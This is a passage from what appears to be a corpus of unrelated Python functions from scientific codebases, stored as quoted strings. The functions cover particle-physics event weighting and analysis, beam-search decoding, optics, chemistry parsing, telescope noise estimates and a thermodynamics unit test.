BTagWeightNHeavy_down *= btagSF_down * eff\n BTagWeightNHeavy_up_FS *= btagSF_up_FS * eff\n BTagWeightNHeavy_down_FS *= btagSF_down_FS * eff\n BTagWeightDHeavy *= eff\n else:\n BTagWeightNLight *= btagSF * eff\n BTagWeightNLight_FS *= btagSF_FS * eff\n BTagWeightNLight_up *= btagSF_up * eff\n BTagWeightNLight_down *= btagSF_down * eff\n BTagWeightNLight_up_FS *= btagSF_up_FS * eff\n BTagWeightNLight_down_FS *= btagSF_down_FS * eff\n BTagWeightDLight *= eff\n\n BTagWeightD *= eff\n else:\n #check if eff is 1.0\n if eff > 0.999:\n eff = 0.999\n\n BTagWeightN *= 1 - btagSF * eff\n BTagWeightN_FS *= 1 - btagSF_FS * eff\n BTagWeightN_up *= 1 - btagSF_up * eff\n BTagWeightN_down *= 1 - btagSF_down * eff\n BTagWeightN_up_FS *= 1 - btagSF_up_FS * eff\n BTagWeightN_down_FS *= 1 - btagSF_down_FS * eff\n\n if abs(flavor) == 5:\n BTagWeightNHeavy *= 1 - btagSF * eff\n BTagWeightNHeavy_FS *= 1 - btagSF_FS * eff\n BTagWeightNHeavy_up *= 1 - btagSF_up * eff\n BTagWeightNHeavy_down *= 1 - btagSF_down * eff\n BTagWeightNHeavy_up_FS *= 1 - btagSF_up_FS * eff\n BTagWeightNHeavy_down_FS *= 1 - btagSF_down_FS * eff\n BTagWeightDHeavy *= 1 - eff\n else:\n BTagWeightNLight *= 1 - btagSF * eff\n BTagWeightNLight_FS *= 1 - btagSF_FS * eff\n BTagWeightNLight_up *= 1 - btagSF_up * eff\n BTagWeightNLight_up_FS *= 1 - btagSF_up_FS * eff\n BTagWeightNLight_down *= 1 - btagSF_down * eff\n BTagWeightNLight_down_FS *= 1 - btagSF_down_FS * eff\n BTagWeightDLight *= 1 - eff\n\n BTagWeightD *= 1 - eff\n \n if self.FastSim:\n self.out.fillBranch(\"BTagWeight_FS\", BTagWeightN_FS / BTagWeightD)\n self.out.fillBranch(\"BTagWeight_Up_FS\", BTagWeightN_up_FS / BTagWeightD)\n self.out.fillBranch(\"BTagWeight_Down_FS\", BTagWeightN_down_FS / BTagWeightD)\n self.out.fillBranch(\"BTagWeightHeavy_FS\", BTagWeightNHeavy_FS / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightHeavy_Up_FS\", BTagWeightNHeavy_up_FS / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightHeavy_Down_FS\", BTagWeightNHeavy_down_FS / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightLight_FS\", BTagWeightNLight_FS / BTagWeightDLight)\n self.out.fillBranch(\"BTagWeightLight_Up_FS\", BTagWeightNLight_up_FS / BTagWeightDLight)\n self.out.fillBranch(\"BTagWeightLight_Down_FS\", BTagWeightNLight_down_FS / BTagWeightDLight)\n self.out.fillBranch(\"BTagWeight\", BTagWeightN / BTagWeightD)\n self.out.fillBranch(\"BTagWeight_Up\", BTagWeightN_up / BTagWeightD)\n self.out.fillBranch(\"BTagWeight_Down\", BTagWeightN_down / BTagWeightD)\n self.out.fillBranch(\"BTagWeightHeavy\", BTagWeightNHeavy / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightHeavy_Up\", BTagWeightNHeavy_up / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightHeavy_Down\", BTagWeightNHeavy_down / BTagWeightDHeavy)\n self.out.fillBranch(\"BTagWeightLight\", BTagWeightNLight / BTagWeightDLight)\n self.out.fillBranch(\"BTagWeightLight_Up\", BTagWeightNLight_up / BTagWeightDLight)\n self.out.fillBranch(\"BTagWeightLight_Down\", BTagWeightNLight_down / BTagWeightDLight)\n return True", "def _forward_beam_search(self, state: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n batch_size = state[\"source_mask\"].size()[0]\n start_predictions = state[\"source_mask\"].new_full(\n (batch_size,), fill_value=self._start_index)\n\n # shape (all_top_k_predictions): (batch_size, beam_size, num_decoding_steps)\n # shape (log_probabilities): (batch_size, beam_size)\n all_top_k_predictions, log_probabilities = self._beam_search.search(\n start_predictions, state, self.take_step)\n\n output_dict = {\n \"class_log_probabilities\": log_probabilities,\n \"predictions\": all_top_k_predictions\n }\n return output_dict", "def beam_search(X, u, w, b, relLabels):\n\n candidate_paths = [[] for _ in range(10)] # contains the candidate label sets\n candidate_vals =[[] for _ in range(10)] # contains the label values (-1/1) for each candidate set\n candidate_scores = [0. for _ in range(10)]\n min_score = -1000\n\n iter = 0\n start = 0\n while True:\n # print(\"Iter: \", iter)\n intermediate_paths = {}\n # intermediate_paths_val = []\n interim_scores = []\n hash_table = {}\n\n cnt_paths = 0\n for cp in range(5):\n labels_curr = candidate_paths[cp]\n labels_val_curr = candidate_vals[cp]\n scores_curr = candidate_scores[cp]\n Y = -np.ones((10, 1))\n for lv in range(len(labels_val_curr)):\n Y[labels_curr[lv]] = labels_val_curr[lv]\n\n for l in range(10):\n candidate_interim = labels_curr[:]\n candidate_vals_interim = labels_val_curr[:]\n # if l in labels_curr:\n # continue\n\n temp_relLabels = []\n for lc in range(len(labels_curr)):\n temp_relLabels.extend(relLabels[labels_curr[lc]])\n\n # temp_relLabels = np.array(list(set(temp_relLabels)))\n temp_relLabels = np.array(list(set(relLabels[l]).intersection(set(labels_curr))))\n model_pos = returnModelVal(X, Y, 1.0, u[l], u[l], b[l][0], np.array(temp_relLabels))\n candidate_interim.append(l)\n\n if model_pos < 0:\n # print('hello')\n candidate_vals_interim.append(-1)\n interim_scores.append(-model_pos)\n else:\n candidate_vals_interim.append(1)\n interim_scores.append(model_pos)\n\n hash_table[cnt_paths] = candidate_interim\n intermediate_paths[cnt_paths] = candidate_vals_interim\n cnt_paths += 1\n # For the first iteration, just iterate once - all labels in one iteration\n if start == 0:\n start = 1\n break\n\n temp_paths = intermediate_paths\n interim_zip = zip(intermediate_paths, interim_scores)\n sorted_scores = sorted(interim_zip, key=lambda x: x[1], reverse=True)[:5]\n intermediate_paths, scores = zip(*sorted_scores)\n\n temp_cand = []\n temp_val = []\n for i in range(len(intermediate_paths)):\n temp_cand.append(hash_table[intermediate_paths[i]])\n temp_val.append(temp_paths[intermediate_paths[i]])\n # candidate_scores[i] += scores[i]\n\n candidate_paths = temp_cand\n candidate_vals = temp_val\n print(candidate_paths)\n print(candidate_vals)\n # print(scores)\n # candidate_scores = scores\n\n # Exit condition from loop\n # if max(interim_scores) < min_score:\n # break\n #\n # min_score = min(interim_scores)\n\n iter += 1\n if iter > 5:\n break\n\n candidate_dict = {}\n for i in range(5):\n for c in range(len(candidate_paths[i])):\n if candidate_paths[i][c] not in candidate_dict:\n candidate_dict[candidate_paths[i][c]] = candidate_vals[i][c]\n elif candidate_dict[candidate_paths[i][c]] != 2:\n if candidate_dict[candidate_paths[i][c]] != candidate_vals[i][c]:\n candidate_dict[candidate_paths[i][c]] = 2.\n\n print(candidate_dict)\n exit()\n return candidate_dict", "def beam(xb,yb,zb,wx,wy,wavelen):\n\n zRx = np.pi * wx**2 / wavelen\n zRy = np.pi * wy**2 / wavelen \n \n sqrtX = np.sqrt( 1 + np.power(zb/zRx,2) ) \n sqrtY = np.sqrt( 1 + np.power(zb/zRy,2) ) \n intensity = np.exp( -2.*( np.power(xb/(wx*sqrtX ),2) \\\n + np.power(yb/(wy*sqrtY),2) )) / sqrtX / sqrtY\n return intensity", "def __analyze(self):\n\n\t\t'''\n\t\ttodo: bSlabList.analyze() needs to step through each edge, not slabs !!!\n\t\t'''\n\n\t\tfor edgeIdx, edge in enumerate(self.edgeDictList):\n\t\t\tlen2d = 0\n\t\t\tlen3d = 0\n\t\t\tlen3d_nathan = 0\n\n\t\t\tslabList = edge['slabList']\n\t\t\tfor j, slabIdx in enumerate(slabList):\n\n\t\t\t\tx1 = self.x[slabIdx]\n\t\t\t\ty1 = self.y[slabIdx]\n\t\t\t\tz1 = self.z[slabIdx]\n\n\t\t\t\t#print('pointIdx:', pointIdx)\n\t\t\t\torig_x = self.orig_x[slabIdx]\n\t\t\t\torig_y = self.orig_y[slabIdx]\n\t\t\t\torig_z = self.orig_z[slabIdx]\n\n\t\t\t\tif j>0:\n\t\t\t\t\tlen3d = len3d + self.euclideanDistance(prev_x1, prev_y1, prev_z1, x1, y1, z1)\n\t\t\t\t\tlen2d = len2d + self.euclideanDistance(prev_x1, prev_y1, None, x1, y1, None)\n\t\t\t\t\tlen3d_nathan = len3d_nathan + self.euclideanDistance(prev_orig_x1, prev_orig_y1, prev_orig_z1, orig_x, orig_y, orig_z)\n\n\t\t\t\t# increment\n\t\t\t\tprev_x1 = x1\n\t\t\t\tprev_y1 = y1\n\t\t\t\tprev_z1 = z1\n\n\t\t\t\tprev_orig_x1 = orig_x\n\t\t\t\tprev_orig_y1 = orig_y\n\t\t\t\tprev_orig_z1 = orig_z\n\n\t\t\tedge['Len 2D'] = round(len2d,2)\n\t\t\tedge['Len 3D'] = round(len3d,2)\n\t\t\tedge['Len 3D Nathan'] = round(len3d_nathan,2)\n\n\t\t\t# diameter, pyqt does not like to display np.float, cast to float()\n\t\t\tmeanDiameter = round(float(np.nanmean(self.d[edge['slabList']])),2)\n\t\t\tedge['Diam'] = meanDiameter", "def get_properties(self):\n assert self.kekulize, '#ERROR: u need to get explicit BOs for amon generation'\n self.vs = np.array([ ai.GetTotalValence() for ai in self.m0.GetAtoms() ], np.int)\n #self.update_bom()\n self.ias_heav = self.ias[ self.zs > 1 ]\n bom_heav = self.bom[ self.ias_heav, : ][ :, self.ias_heav ]\n self.vs_heav = bom_heav.sum(axis=0)\n self.cns_heav = ( bom_heav > 0 ).sum(axis=0)\n self.nhs = self.vs[:self.nheav] - self.vs_heav - self.chgs[:self.nheav]\n self.dvs = self.vs_heav - self.cns_heav\n self.hybs = np.array([ _hyb[ai.GetHybridization()] for ai in self.m.GetAtoms() ])", "def _beamstability_data(self):\n traces = unpack(self._bo + 'i', self.fh.read(4))[0]\n x = []\n data = []\n maxpoints = 0\n for _ in range(traces):\n points = unpack(self._bo + 'i', self.fh.read(4))[0]\n d = np.fromfile(self.fh, dtype=self._bo+'f8', count=2*points).reshape(2, points)\n data.append(d[1])\n if points > maxpoints:\n x = d[0]\n maxpoints = points\n\n for d in range(len(data)):\n pad_width = maxpoints - data[d].shape[0]\n data[d] = np.pad(data[d], (0, pad_width), 'constant')\n\n if self.header['file type'] == 31:\n if self.header['analysis type'].endswith('trolley step scan'):\n xprop = 'radius'\n xunit = 'mm'\n else:\n xprop = 'deflection'\n xunit = 'V'\n elif self.header['file type'] == 35:\n xprop = 'time'\n xunit = 's'\n\n self.data = xarray.DataArray(data, dims=('species', xprop),\n coords={\n 'species': ('species', list(self.header['label list'])),\n xprop: (xprop, x, {'unit': xunit})\n },\n attrs={\n 'unit': 'counts/s'\n })", "def read(self) :\n # Open the file.\n f = open(self.output, 'r')\n lines = f.readlines()\n \n # Find the eigenvalue.\n count = 0\n while True :\n words = lines[count].split()\n if len(words) == 5 :\n if words[0] == \"*\" and words[1] == \"K-EFF\":\n self.keff = float(words[3])\n break\n count += 1\n \n # Find the peaking.\n a = 0 # Assembly index\n \n while True :\n words = lines[count].split()\n if len(words) == 8 :\n if words[0] == \"NODE\" and words[1] == \"AVERAGE\" and words[2] == \"POWERS\" :\n count += 5 # Powers start 5 lines below title\n for row in range(0, self.dimension) :\n words = lines[count].split()\n assert(len(words) >= self.dimension)\n for col in range(0, self.dimension) :\n self.peaking_map[row, col] = float(words[col+1])\n if self.core.stencil[row, col] > 0:\n #print \" a=\", a, \" row=\", row, \" col=\", col, len(self.peaking)\n self.peaking[a] = self.peaking_map[row, col]\n a += 1\n count += 1\n break\n count += 1 \n # Maximum peaking.\n self.maxpeak = np.max(self.peaking)", "def calculate_beam_xy(self):\n info = []\n\n # Import relevant info\n pixel_size = self.info.pixel_size\n for i in [j.final for j in self.final_objects]:\n try:\n info.append(\n [\n i,\n i[\"beamX\"],\n i[\"beamY\"],\n i[\"wavelength\"],\n i[\"distance\"],\n (i[\"a\"], i[\"b\"], i[\"c\"], i[\"alpha\"], i[\"beta\"], i[\"gamma\"]),\n ]\n )\n except IOError as e:\n print(\"IOTA ANALYSIS ERROR: BEAMXY failed! \", e)\n pass\n\n # Calculate beam center coordinates and distances\n beamX = [i[1] for i in info]\n beamY = [j[2] for j in info]\n beam_dist = [\n math.hypot(i[1] - np.median(beamX), i[2] - np.median(beamY)) for i in info\n ]\n beam_dist_std = np.std(beam_dist)\n img_list = [\n [i[0], i[1], i[2], i[3], i[4], i[5], j]\n for i, j in list(zip(info, beam_dist))\n ]\n\n # Separate out outliers\n outliers = [i for i in img_list if i[3] > 2 * beam_dist_std]\n clean = [i for i in img_list if i[3] <= 2 * beam_dist_std]\n cbeamX = [i[1] for i in clean]\n cbeamY = [j[2] for j in clean]\n obeamX = [i[1] for i in outliers]\n obeamY = [j[2] for j in outliers]\n\n # Calculate median wavelength, detector distance and unit cell params from\n # non-outliers only\n wavelengths = [i[3] for i in clean]\n distances = [i[4] for i in clean]\n cells = [i[5] for i in clean]\n\n wavelength = np.median(wavelengths)\n det_distance = np.median(distances)\n a = np.median([i[0] for i in cells])\n b = np.median([i[1] for i in cells])\n c = np.median([i[2] for i in cells])\n\n # Calculate predicted L +/- 1 misindexing distance for each cell edge\n aD = det_distance * math.tan(2 * math.asin(wavelength / (2 * a)))\n bD = det_distance * math.tan(2 * math.asin(wavelength / (2 * b)))\n cD = det_distance * math.tan(2 * math.asin(wavelength / (2 * c)))\n\n return (\n beamX,\n beamY,\n cbeamX,\n cbeamY,\n obeamX,\n obeamY,\n beam_dist,\n [i[4] for i in info],\n aD,\n bD,\n cD,\n pixel_size,\n )", "def beam_filter(self, ouput_token_step):\n idx_array = np.argpartition(ouput_token_step[0, -1, :], -self.beam_width)[-self.beam_width:] #index for reverse_target_word\n prob_array = np.log(np.partition(ouput_token_step[0, -1, :], -self.beam_width)[-self.beam_width:])\n \n return idx_array, prob_array", "def test_set_ps(self):\n s = State(substance=\"water\")\n s.ps = Q_(101325.0, \"Pa\"), Q_(3028.9867985920914, \"J/(kg*K)\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(373.1242958476843, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.ps[0], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.ps[1], Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.u, Q_(1013250.0, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(0.4772010021515822, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(1061602.391543017, \"J/kg\")) # type: ignore\n assert np.isclose(s.x, Q_(0.28475636946248034, \"dimensionless\")) # type: ignore\n s.ps = Q_(101325.0, \"Pa\"), Q_(8623.283568815832, \"J/(kg*K)\")\n assert np.isclose(s.T, Q_(700.9882316847855, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.ps[0], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.ps[1], Q_(8623.283568815832, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.u, Q_(3013250.0, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(8623.283568815832, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(3.189303132125469, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(3336406.139862406, \"J/kg\")) # type: ignore\n assert s.x is None", "def get_SAs(self):\n\n self.r_max_SA = 0\n self.p_max_SA = 0\n self.delta_SA = 0\n for m in self.components:\n prop_dict = m.read_prop_file()\n\n # Ignore compounds that are common solvents or salts.\n # if m.name not in KEGG_IDs_to_ignore():\n if m.role == 'reactant':\n self.r_max_SA = max([\n self.r_max_SA,\n prop_dict['Synth_score']\n ])\n elif m.role == 'product':\n self.p_max_SA = max([\n self.p_max_SA,\n prop_dict['Synth_score']\n ])\n\n self.delta_SA = self.p_max_SA - self.r_max_SA", "def translate_beam_search(source_sentence: List[int], model: Seq2SeqAttentionModel,\n beam_width: int, max_length=10) -> Tuple[List[int], float]:\n encoder_hiddens = encode_all(source_sentence, model)\n beam_elems = []\n # stack x hid_dim\n prev_hidden = encoder_hiddens[-1]\n prev_context = torch.zeros(model.hidden_dim)\n\n beam_elems= [([SOS_token], float(0), prev_hidden, prev_context)]\n candidate_translations = []\n available_width = beam_width\n\n for i in range(max_length):\n if available_width >0:\n candidate_beam_elems = []\n for b in range(len(beam_elems)):\n prev_predict, prev_log_prob, prev_hidden, prev_context = beam_elems[b]\n probs, prev_hidden, prev_context, _ = decode(prev_hidden, encoder_hiddens, prev_context,\n prev_predict[-1], model)\n log_probs = torch.log(probs)\n top_log_probs, top_preds = torch.topk(log_probs,available_width)\n for k in range(len(top_log_probs)):\n curr_log_prob = prev_log_prob + top_log_probs[k].item()\n curr_pred_list = prev_predict + [top_preds[k].item()]\n candidate = (curr_pred_list, curr_log_prob, prev_hidden, prev_context)\n candidate_pos = -1\n for pos in range(len(candidate_beam_elems)):\n if curr_log_prob > candidate_beam_elems[pos][1]:\n candidate_pos = pos\n if not candidate_pos == -1:\n candidate_beam_elems.insert(candidate_pos+1, candidate)\n elif len(candidate_beam_elems) < available_width:\n candidate_beam_elems.append(candidate)\n if len(candidate_beam_elems) > available_width:\n candidate_beam_elems.pop()\n\n beam_elems = []\n for candidate in candidate_beam_elems:\n if candidate[0][-1] == EOS_token or i==(max_length-1):\n candidate_translations.append(candidate)\n available_width -= 1\n else:\n beam_elems.append(candidate)\n\n max_prob = -math.inf\n best_elem = -1\n for pos in range(len(candidate_translations)):\n norm_prob = candidate_translations[pos][1]/len(candidate_translations[pos][0])\n if norm_prob > max_prob:\n max_prob = norm_prob\n best_elem = pos\n\n # remove SOS token from the beginning\n del candidate_translations[best_elem][0][0]\n\n return candidate_translations[best_elem][0], candidate_translations[best_elem][1]", "def cal_Beam_TheoRMS(n_ant, tobs, chan_width, sbid):\n \n BEAM_T_RMS = []\n\n coreff = 0.8 # correlator efficiency\n npol = 2.0 # Number of polarisation, npol = 2 for images in Stokes I, Q, U, or V\n\n obj = bf.load_beamset_class('SEFD_{}.hdf5'.format(sbid))\n freq = obj.frequencies\n data = obj.data #[time, antenna, beam, polarisation, channel, payload]\n pol_XX = 0 # polarisation 0 - 3 (XX,XY,YX,YY)\n pol_YY = 3\n \n for beam in range(36):\n med_XX_SEFD = np.median(data[0, :, beam, pol_XX, :, 0]) #use all available antennas\n med_YY_SEFD = np.median(data[0, :, beam, pol_YY, :, 0]) \n med_SEFD = 0.5*math.sqrt(med_XX_SEFD**2.0 + med_YY_SEFD**2.0) # SEFD of stokes I\n t_rms_mjy = 1000.*(med_SEFD/(coreff*math.sqrt(npol*n_ant*(n_ant-1)*chan_width*tobs)))\n BEAM_T_RMS.append(t_rms_mjy)\n\n return BEAM_T_RMS", "def s_pos(self):\n running_total = 0\n for i in range(self.prob.num):\n if self.alphas[i] > 1e-5 > self.prob.C - self.deltas[i] and self.prob.Y[i] == 1:\n ayxx = 0\n for j in range(self.prob.num):\n ayxx += self.alphas[j] * self.prob.Y[j] * self.prob.xkernel(self.prob.X[j], self.prob.X[i])\n running_total += 1 - ayxx\n return running_total", "def score(self, beam, logprobs):\n l_term = (((5 + len(beam.next_ys)) ** self.alpha) /\n ((5 + 1) ** self.alpha))\n return (logprobs / l_term)", "def read_properties_sp(lines):\n\n # TODO Better logging for crashed xtb\n if not read_status(lines):\n return None\n\n keywords = [\n \"final structure:\",\n \":: SUMMARY ::\",\n \"Property Printout \",\n \"ITERATIONS\",\n ]\n\n stoppattern = \"CYCLE \"\n idxs = linesio.get_rev_indices_patterns(lines, keywords, stoppattern=stoppattern)\n idxs[0]\n idx_summary = idxs[1]\n idx_end_summary = idxs[2]\n idxs[3]\n\n if idx_summary is None:\n # TODO Better fix\n assert False, \"uncaught xtb exception\"\n\n # Get atom count\n keyword = \"number of atoms\"\n idx = linesio.get_index(lines, keyword)\n line = lines[idx]\n n_atoms = line.split()[-1]\n n_atoms = int(n_atoms)\n\n # Get energies\n idx_summary = idxs[1] + 1\n\n # :: total energy +1\n # :: total w/o Gsasa/hb +2\n # :: gradient norm +3\n # :: HOMO-LUMO gap +4\n # ::.....................+4\n # :: SCC energy +5\n # :: -> isotropic ES +6\n # :: -> anisotropic ES +7\n # :: -> anisotropic XC +8\n # :: -> dispersion +9\n # :: -> Gsolv +10\n # :: -> Gborn +11\n # :: -> Gsasa +12\n # :: -> Ghb +13\n # :: -> Gshift +14\n # :: repulsion energy +15\n # :: add. restraining +16\n\n prop_lines = lines[idx_summary : idx_end_summary - 2]\n prop_dict = parse_sum_table(prop_lines)\n\n # total_energy = prop_dict.get(\"total_energy\", float(\"nan\"))\n # gsolv = prop_dict.get(\"gsolv\", float(\"nan\"))\n # electronic_energy = prop_dict.get(\"scc_energy\", float(\"nan\"))\n\n properties = prop_dict\n\n # Get dipole\n dipole_str = \"molecular dipole:\"\n idx = linesio.get_rev_index(lines, dipole_str)\n if idx is None:\n dipole_tot = None\n else:\n idx += 3\n line = lines[idx]\n line = line.split()\n dipole_tot = line[-1]\n dipole_tot = float(dipole_tot)\n\n properties = {\n COLUMN_DIPOLE: dipole_tot,\n **properties,\n }\n\n # Get covalent properties\n properties_covalent = read_covalent_coordination(lines)\n\n # Get orbitals\n properties_orbitals = read_properties_orbitals(lines)\n properties = {**properties, **properties_orbitals, **properties_covalent}\n\n return properties", "def analyze(self, event):\n\n event = mappedEvent(event, mapname=self._branch_map)\n\n values = []\n ev = event.event\n\n values.append(self.GetValue(event, \"Lepton_pt[0]\") * math.cos(self.GetValue(event, \"Lepton_phi[0]\")))\n values.append(self.GetValue(event, \"Lepton_pt[0]\") * math.sin(self.GetValue(event, \"Lepton_phi[0]\")))\n values.append(self.GetValue(event, \"Lepton_pt[0]\") * math.sinh(self.GetValue(event, \"Lepton_eta[0]\")))\n values.append(self.GetValue(event, \"Lepton_pt[1]\") * math.cos(self.GetValue(event, \"Lepton_phi[1]\")))\n values.append(self.GetValue(event, \"Lepton_pt[1]\") * math.sin(self.GetValue(event, \"Lepton_phi[1]\")))\n values.append(self.GetValue(event, \"Lepton_pt[1]\") * math.sinh(self.GetValue(event, \"Lepton_eta[1]\")))\n\n if self.GetValue(event, \"nCleanJet\")>=1:\n values.append(self.GetValue(event, \"CleanJet_pt[0]\") * math.cos(self.GetValue(event, \"CleanJet_phi[0]\")))\n values.append(self.GetValue(event, \"CleanJet_pt[0]\") * math.sin(self.GetValue(event, \"CleanJet_phi[0]\")))\n values.append(self.GetValue(event, \"CleanJet_pt[0]\") * math.sinh(self.GetValue(event, \"CleanJet_eta[0]\")))\n else:\n values.append(0.0)\n values.append(0.0)\n values.append(0.0)\n if self.GetValue(event, \"nCleanJet\")>=2:\n values.append(self.GetValue(event, \"CleanJet_pt[1]\") * math.cos(self.GetValue(event, \"CleanJet_phi[1]\")))\n values.append(self.GetValue(event, \"CleanJet_pt[1]\") * math.sin(self.GetValue(event, \"CleanJet_phi[1]\")))\n values.append(self.GetValue(event, \"CleanJet_pt[1]\") * math.sinh(self.GetValue(event, \"CleanJet_eta[1]\")))\n else:\n values.append(0.0)\n values.append(0.0)\n values.append(0.0)\n\n values.append(self.GetValue(event, \"PuppiMET_pt\") * math.cos(self.GetValue(event, \"PuppiMET_phi\")))\n values.append(self.GetValue(event, \"PuppiMET_pt\") * math.sin(self.GetValue(event, \"PuppiMET_phi\")))\n values.append(self.GetValue(event, \"dphilmet1\"))\n values.append(self.GetValue(event, \"dphilmet2\"))\n values.append(self.GetValue(event, \"mll\"))\n values.append(self.GetValue(event, \"mTi\"))\n values.append(self.GetValue(event, \"mth\"))\n values.append(self.GetValue(event, \"mtw1\"))\n values.append(self.GetValue(event, \"mtw2\"))\n values.append(self.GetValue(event, \"ht\"))\n values.append(self.GetValue(event, \"vht_pt\") * math.cos(self.GetValue(event, \"vht_phi\")))\n values.append(self.GetValue(event, \"vht_pt\") * math.sin(self.GetValue(event, \"vht_phi\")))\n\n\n values_stacked = np.hstack(values).reshape(1, len(values))\n values_preprocessed = self.preprocessing[ev % 2].transform(values_stacked)\n response = self.classifiers[ev % 2].predict(values_preprocessed)\n response = np.squeeze(response)\n\n self.out.fillBranch(\"DNN_mth\", response)\n\n return True", "def calculate(self):\n\n gt = self.ground_truth.flatten()\n seg = self.segmentation.flatten()\n\n n = gt.size\n mean_gt = gt.mean()\n mean_seg = seg.mean()\n mean = (mean_gt + mean_seg) / 2\n\n m = (gt + seg) / 2\n ssw = np.power(gt - m, 2).sum() + np.power(seg - m, 2).sum()\n ssb = np.power(m - mean, 2).sum()\n\n ssw /= n\n ssb = ssb / (n - 1) * 2\n\n return (ssb - ssw) / (ssb + ssw)", "def analyze(self, event):\n ##### set variables ####\n self.nElectrons = 0\n self.nMuons = 0\n self.nTaus = 0\n self.nFatJets = 0\n self.EventWeight = 1.\n self.TopWeight = 1.\n self.BTagAK8Weight = 1.\n self.BTagAK4Weight = 1.\n self.BTagAK8Weight_deep = 1.\n self.BTagAK8Weight_deep_up = 1.\n self.BTagAK8Weight_deep_down = 1.\n self.BTagAK4Weight_deep = 1.\n self.BTagAK4Weight_deep_up = 1.\n self.BTagAK4Weight_deep_down = 1.\n self.BBTagWeight = 1.\n self.GenWeight = 1.\n self.PUWeight = 1.\n self.LeptonWeight = 1.\n self.LeptonWeightUp = 1.\n self.LeptonWeightDown = 1.\n self.TriggerWeight = 1.\n self.TriggerWeightUp = 1.\n self.TriggerWeightDown = 1.\n self.isZtoMM = False\n self.isZtoEE = False\n self.isZtoNN = False\n self.isTtoEM = False\n self.isBoosted4B = False\n self.isHtobb = False\n self.isHtobb_ml = False\n self.isMaxBTag_loose = False\n self.isMaxBTag_medium = False\n self.isMaxBTag_tight = False\n self.isVBF = False\n self.is2016 = False\n self.is2017 = False\n self.is2018 = False\n self.nTaus = 0\n self.nJetsNoFatJet = 0\n self.H_partonflavour = -1.\n self.H_hadronflavour = -1.\n self.DPhi = -1.\n self.VHDEta = -1.\n self.MinJetMetDPhi = 10.\n self.MaxJetNoFatJetBTag = -1.\n self.BtagDeepB = -1.\n self.DeepTagMD_H4qvsQCD = -1.\n self.DeepTagMD_HbbvsQCD = -1.\n self.DeepTagMD_ZHbbvsQCD = -1.\n self.DeepTagMD_ZbbvsQCD = -1.\n self.DeepTagMD_bbvsLight = -1.\n self.DeepTagMD_WvsQCD = -1.\n self.DeepTagMD_ZvsQCD = -1.\n self.Mu1_pt = -1.\n self.Mu1_eta = -1.\n self.Mu1_phi = -1.\n self.Mu1_mass = -1.\n self.Mu1_pfIsoId = -1.\n self.Mu1_relIso = -1.\n self.Mu1_highPtId = -1.\n self.Mu2_pt = -1.\n self.Mu2_eta = -1.\n self.Mu2_phi = -1.\n self.Mu2_mass = -1.\n self.Mu2_pfIsoId = -1.\n self.Mu2_relIso = -1.\n self.Mu2_highPtId = -1.\n self.Ele1_pt = -1.\n self.Ele1_eta = -1.\n self.Ele1_phi = -1.\n self.Ele1_mass = -1.\n self.Ele2_pt = -1.\n self.Ele2_eta = -1.\n self.Ele2_phi = -1.\n self.Ele2_mass = -1.\n self.Ele_HEM15_16 = -1.\n self.HT_HEM15_16 = -1.\n self.HT = 0.\n self.LHEScaleWeight = -1.\n self.LHEPdfWeight = -1.\n self.LHEWeight_originalXWGTUP = -1.\n self.PrefireWeight = 1.\n self.PrefireWeightUp = 1.\n self.PrefireWeightDown = 1.\n self.QCDNLO_Corr = 1.\n self.QCDNNLO_Corr = 1.\n self.EWKNLO_Corr = 1.\n self.Jet1_VBF_pt = -1.\n self.Jet1_VBF_eta = -1.\n self.Jet1_VBF_phi = -1.\n self.Jet1_VBF_mass = -1.\n self.Jet2_VBF_pt = -1.\n self.Jet2_VBF_eta = -1.\n self.Jet2_VBF_phi = -1.\n self.Jet2_VBF_mass = -1.\n self.dijet_VBF_mass = -1.\n self.deltaR_VBF = -1.\n self.deltaR_HVBFjet1 = -1.\n self.deltaR_HVBFjet2 = -1.\n self.H_pt = -1.\n self.H_eta = -1.\n self.H_phi = -1.\n self.H_mass = -1.\n self.H_M = -1.\n self.H_tau21 = -1.\n self.H_tau41 = -1.\n self.H_tau42 = -1.\n self.H_tau31 = -1.\n self.H_tau32 = -1.\n self.H_ddt = -1.\n self.H_csv1 = -1.\n self.H_csv2 = -1.\n self.H_deepcsv1 = -1.\n self.H_deepcsv2 = -1.\n self.H_dbt = -1.\n self.H_chf = -1.\n self.H_nhf = -1.\n self.V_pt = -1.\n self.V_eta = -1.\n self.V_phi = -1.\n self.V_mass = -1.\n self.VH_deltaR = -1.\n self.X_pt = -1.\n self.X_eta = -1.\n self.X_phi = -1.\n self.X_mass = -1.\n self.X_mass_chs = -1.\n self.X_mass_nom = -1.\n self.X_mass_jesUp = -1.\n self.X_mass_jesDown = -1.\n self.X_mass_jerUp = -1.\n self.X_mass_jerDown = -1.\n self.X_mass_MET_nom = -1.\n self.X_mass_MET_jesUp = -1.\n self.X_mass_MET_jesDown = -1.\n self.X_mass_MET_jerUp = -1.\n self.X_mass_MET_jerDown = -1.\n self.H_mass_nom = -1.\n self.H_mass_jmsUp = -1.\n self.H_mass_jmsDown = -1.\n self.H_mass_jmrUp = -1.\n self.H_mass_jmrDown = -1.\n\n \n \n eecutflow_list = []\n mmcutflow_list = []\n nncutflow_list = []\n\n idx_electrons = []\n idx_loose_electrons = []\n idx_muons = []\n idx_loose_muons = []\n idx_fatjet = []\n idx_jet = 